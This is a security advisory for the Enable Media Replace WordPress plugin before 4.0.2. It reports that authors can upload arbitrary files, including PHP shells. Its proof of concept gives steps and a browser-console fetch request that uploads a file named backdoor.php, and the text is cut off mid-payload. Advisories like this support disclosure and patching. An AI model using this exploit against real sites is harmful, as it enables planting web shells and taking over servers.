Enable Media Replace < 4.0.2 - Author+ Arbitrary File Upload

The plugin does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.

PoC

1. As an Author, upload a picture via http://vulnerable-site.tld/wp-admin/upload.php 2) Press on the new picture’s thumbnail to see the attachment’s details 3) Click on “Upload a new file”, next to “Replace media” 4) Paste the following in your browser’s developer console: ``` await fetch(document.forms[0].action, { “credentials”: “include”, “headers”: { “User-Agent”: “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8”, “Accept-Language”: “en-CA,en-US;q=0.7,en;q=0.3”, “Content-Type”: “multipart/form-data; boundary=---------------------------294159958331225347843177109147”, “Upgrade-Insecure-Requests”: “1” }, “body”: `-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name="ID"\r\n\r\n${document.forms[0].action.match(/attachment_id=(\d+)/)[1]}\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name="userfile"; filename="backdoor.php"\r\nContent-Type: text/php\r\n\r\n